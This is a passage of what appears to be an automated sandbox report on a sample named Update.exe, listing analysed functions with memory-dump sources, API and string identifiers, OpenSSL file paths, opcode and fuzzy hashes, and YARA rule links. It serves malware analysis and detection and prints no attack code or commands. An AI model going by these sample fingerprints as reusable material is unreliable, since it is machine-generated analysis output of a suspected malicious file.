                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                              • String ID:
                                                              • API String ID: 2933794660-0
                                                              • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                              • Instruction ID: b68ef11494f9cf9277a617ec124905cfcfad58d9ddf122eaaefe59ca5aca56dc
                                                              • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                              • Instruction Fuzzy Hash: D7111C22B14B058AEF008F60EC552A933A4FB59B58F441E31DA6D977A4EF78E6588341
                                                              Function 00007FFDFAEE177B Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 445COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986715794.00007FFDFAEE1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986686816.00007FFDFAEE0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF54000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF56000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF79000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF84000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF8E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986917456.00007FFDFAF91000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986947251.00007FFDFAF93000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $..\s\ssl\statem\extensions_srvr.c
                                                              • API String ID: 0-1533168471
                                                              • Opcode ID: 3a3098dfb846c9c121a9c1ce49b31b97a850979f605987c42cedba07d40a0cf7
                                                              • Instruction ID: 169610cac3018812bf54a459b7f47e1ff21ab4f6f2404d02baf1b9ce16c8b37d
                                                              • Opcode Fuzzy Hash: 3a3098dfb846c9c121a9c1ce49b31b97a850979f605987c42cedba07d40a0cf7
                                                              • Instruction Fuzzy Hash: 1112B5A1B1868242EB289B21D464BBD77D1EF80794F4442B1FE6E4A6DDDF3CE644CB00
                                                              Function 00007FFDFAEE2554 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 296COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986715794.00007FFDFAEE1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986686816.00007FFDFAEE0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF54000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF56000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF79000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF84000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF8E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986917456.00007FFDFAF91000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986947251.00007FFDFAF93000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ..\s\ssl\ssl_rsa.c
                                                              • API String ID: 0-2723262194
                                                              • Opcode ID: 34fa39ca3df4abed1b38f386197ecaa3b9bcaa3fa8e82401e332a61f91bff808
                                                              • Instruction ID: f9de923d8b62dc8d189eb8e41987f008ceb2322f9de431320b560dd669f48b8c
                                                              • Opcode Fuzzy Hash: 34fa39ca3df4abed1b38f386197ecaa3b9bcaa3fa8e82401e332a61f91bff808
                                                              • Instruction Fuzzy Hash: 1EC1D261F1C65699FB288B61D460ABC26B0AF05BA8F400279FE5E4BBCDDF3CD6058744
                                                              Function 00007FFDFAEE2004 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 246COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986715794.00007FFDFAEE1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986686816.00007FFDFAEE0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF54000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF56000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF79000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF84000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF8E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986917456.00007FFDFAF91000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986947251.00007FFDFAF93000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Similarity
                                                              • API ID: 00007$E133311
                                                              • String ID: ..\s\ssl\ssl_sess.c
                                                              • API String ID: 125162164-2868363209
                                                              • Opcode ID: ab109126bee30d2ec08c4dc11c06369e4797c85e910cf8a983de278d297afffd
                                                              • Instruction ID: b57abeeb40d9fe53e0e7045d882d52eaf9096282ccc0a16ce4e7e8919e8ac808
                                                              • Opcode Fuzzy Hash: ab109126bee30d2ec08c4dc11c06369e4797c85e910cf8a983de278d297afffd
                                                              • Instruction Fuzzy Hash: 74C19032B0868696E7689F11D560BB933A4FF84BA8F044275EE5E4B7E8DF39E445C700
                                                              Function 00007FFDFAEE2040 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986715794.00007FFDFAEE1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986686816.00007FFDFAEE0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF54000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF56000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF79000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF84000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF8E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986917456.00007FFDFAF91000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986947251.00007FFDFAF93000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Similarity
                                                              • API ID: 00007B6570
                                                              • String ID: ..\s\ssl\d1_srtp.c$H
                                                              • API String ID: 4069847057-1001428523
                                                              • Opcode ID: b51f3226e0d329e7cd079b5a8298019df0ae001e61472a40b9c5bc9bad79cbca
                                                              • Instruction ID: 9a756bd4aeede9ad91f22ec46f6a7cf05509161143915dda8a29a4c7c0a4dfeb
                                                              • Opcode Fuzzy Hash: b51f3226e0d329e7cd079b5a8298019df0ae001e61472a40b9c5bc9bad79cbca
                                                              • Instruction Fuzzy Hash: 5A411921F0D24345FB58AB69E460BBA76A0EF44794F0544B1ED2E8B7CDDE3EE9528300
                                                              Function 00007FF623F95B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _get_daylight$_invalid_parameter_noinfo
                                                              • String ID: ?
                                                              • API String ID: 1286766494-1684325040
                                                              • Opcode ID: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                              • Instruction ID: 83c60e1fb4f54a3e4a79aa84e5ae70ab4296b29a26632ff6241c41f55264b59f
                                                              • Opcode Fuzzy Hash: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                              • Instruction Fuzzy Hash: 91410522A0828246FF649F26BC0237A6650EB80BE4F148275EF5C97BD5DF3CD6418702
                                                              Function 00007FFDFAFA2748 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 118COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1987005152.00007FFDFAFA1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAFA0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986977487.00007FFDFAFA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFAD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB005000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB019000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB029000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB03D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1EE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB21B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB24D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB272000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2E5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2F2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987760370.00007FFDFB2F6000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987789006.00007FFDFB2F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Similarity
                                                              • API ID: 00007
                                                              • String ID: %02d%02d%02d%02d%02d%02dZ$%04d%02d%02d%02d%02d%02dZ
                                                              • API String ID: 3568877910-2648760357
                                                              • Opcode ID: 44843c6316de3de0d0998b74d2a3bbc3a6269f6be012f31292ad9ddc303ef141
                                                              • Instruction ID: 6783cfb7a8d6642ecf947f6fa05621d2d58dc24e0e42f030e45119acc0ff3030
                                                              • Opcode Fuzzy Hash: 44843c6316de3de0d0998b74d2a3bbc3a6269f6be012f31292ad9ddc303ef141
                                                              • Instruction Fuzzy Hash: E7516332B197828AE760CF15E4506AAB7A0FB89750F545135EA9D87BADDF3CE5408F00
                                                              Function 00007FFE13334710 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: abort$CreateFrameInfo
                                                              • String ID: csm
                                                              • API String ID: 2697087660-1018135373
                                                              • Opcode ID: f6943bea1c78c8542bb5a279c29cdd6a6ec40214996e776607272464948ef889
                                                              • Instruction ID: 63c9a1b817b6f42e95bb9dd8edb4a04e037c87f04d44ef8a8eec2cfce56ae8b6
                                                              • Opcode Fuzzy Hash: f6943bea1c78c8542bb5a279c29cdd6a6ec40214996e776607272464948ef889
                                                              • Instruction Fuzzy Hash: 71515F36A18B818AD620AF17E04126EB7A4FB98FB0F144575EB9D17B65CF3CE460CB04
                                                              Function 00007FFDFAFA1613 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1987005152.00007FFDFAFA1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAFA0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986977487.00007FFDFAFA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFAD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB005000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB019000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB029000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB03D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1EE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB21B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB24D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB272000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2E5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2F2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987760370.00007FFDFB2F6000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987789006.00007FFDFB2F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Similarity
                                                              • API ID: getaddrinfo
                                                              • String ID: ..\s\crypto\bio\b_addr.c
                                                              • API String ID: 300660673-2547254400
                                                              • Opcode ID: ff362b2e146a9955ea5a374bf5228206e2dd813b74c8d22398f2e98f30882444
                                                              • Instruction ID: b7205059acaba553459120954f08fb7776805a95a0f476200e3ef6759be6c01d
                                                              • Opcode Fuzzy Hash: ff362b2e146a9955ea5a374bf5228206e2dd813b74c8d22398f2e98f30882444
                                                              • Instruction Fuzzy Hash: 2E41E232B186838BE7248B22A851AAAB791FB85744F004135FA9987BD9DF3CD8459F40
                                                              Function 00007FFDFAEE23C4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986715794.00007FFDFAEE1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986686816.00007FFDFAEE0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF54000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF56000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF79000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF84000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF8E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986917456.00007FFDFAF91000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986947251.00007FFDFAF93000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Similarity
                                                              • API ID: 00007E133311
                                                              • String ID: ..\s\ssl\statem\extensions_clnt.c
                                                              • API String ID: 3807962231-592572767
                                                              • Opcode ID: 2277d602e12e024388a9d4cef9287e1d4121b4c948b8fb80c28345a1f791c9cc
                                                              • Instruction ID: 5f2f7f8915cd656cd5aec8a8bbb6f0ccccf822e89807eec2641fcc914649c622
                                                              • Opcode Fuzzy Hash: 2277d602e12e024388a9d4cef9287e1d4121b4c948b8fb80c28345a1f791c9cc
                                                              • Instruction Fuzzy Hash: C241BE72708A8196E7288B01E450ABDB3B4FF44BD4F584572EB6D0BB98DF7CD5A18700
                                                              Function 00007FF623F89014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF623F89046
                                                                • Part of subcall function 00007FF623F8A948: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF623F92D22,?,?,?,00007FF623F92D5F,?,?,00000000,00007FF623F93225,?,?,?,00007FF623F93157), ref: 00007FF623F8A95E
                                                                • Part of subcall function 00007FF623F8A948: GetLastError.KERNEL32(?,?,?,00007FF623F92D22,?,?,?,00007FF623F92D5F,?,?,00000000,00007FF623F93225,?,?,?,00007FF623F93157), ref: 00007FF623F8A968
                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF623F7CBA5), ref: 00007FF623F89064
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: BoundaryDeleteDescriptorErrorFileLastModuleName_invalid_parameter_noinfo
                                                              • String ID: C:\Users\user\Desktop\Update.exe
                                                              • API String ID: 3976345311-1768034453
                                                              • Opcode ID: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                              • Instruction ID: 593411921f3b555df8f6e26dce1b84cebcac1e1bed27551df25f9a05b9c116fe
                                                              • Opcode Fuzzy Hash: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                              • Instruction Fuzzy Hash: 12417C32A08B0296EF199F22BC460B967A5EB447D0B554075ED4EA7B95DF3CE681C302
                                                              Function 00007FF623F8CC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID: U
                                                              • API String ID: 442123175-4171548499
                                                              • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                              • Instruction ID: 537f02b41d420c57e4db57f63c1ff5e07a04c43852b8cc3490226edb0dc268b7
                                                              • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                              • Instruction Fuzzy Hash: 1241B232B19A8181EB209F26F8453AAA7A1FB89BC4F404131EE4DD7798EF3CD501C741
                                                              Function 00007FFDFB1E5DE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 99COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1987005152.00007FFDFB03D000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAFA0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986977487.00007FFDFAFA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFA1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFAD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB005000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB019000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB029000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1EE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB21B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB24D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB272000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2E5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2F2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987760370.00007FFDFB2F6000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987789006.00007FFDFB2F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Similarity
                                                              • API ID: 00007E13331170
                                                              • String ID: ..\s\crypto\x509v3\v3_utl.c$E
                                                              • API String ID: 807315919-2813183830
                                                              • Opcode ID: a8f8308ae76c61ed97a228cbd4ccb8f2f55785538172c1eb28062ac2b20ad3e8
                                                              • Instruction ID: bf00d763951f6a9699b0fc5a679bed4bf810f2269b9d5aa9dbae521f4e8c8b4d
                                                              • Opcode Fuzzy Hash: a8f8308ae76c61ed97a228cbd4ccb8f2f55785538172c1eb28062ac2b20ad3e8
                                                              • Instruction Fuzzy Hash: 46414F62B0A74385FB54EB12E430AA9A291AF48794F885435EE6C4B7EDDF3CF551C700
                                                              Function 00007FFDFAFA39BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1987005152.00007FFDFAFA1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAFA0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986977487.00007FFDFAFA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFAD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB005000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB019000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB029000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB03D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1EE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB21B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB24D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB272000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2E5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2F2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987760370.00007FFDFB2F6000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987789006.00007FFDFB2F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Similarity
                                                              • API ID: 00007E2002
                                                              • String ID: ..\s\crypto\rand\randfile.c$Filename=
                                                              • API String ID: 1750240854-2201148535
                                                              • Opcode ID: b92129e8508862641eed399a8e5179a0bb6c7147643e5021365d23c2bd3b3ffe
                                                              • Instruction ID: 67d437f5aaf5e3da6ccbeeaae73cdc8d726577495aad7b09bd51198ad8973473
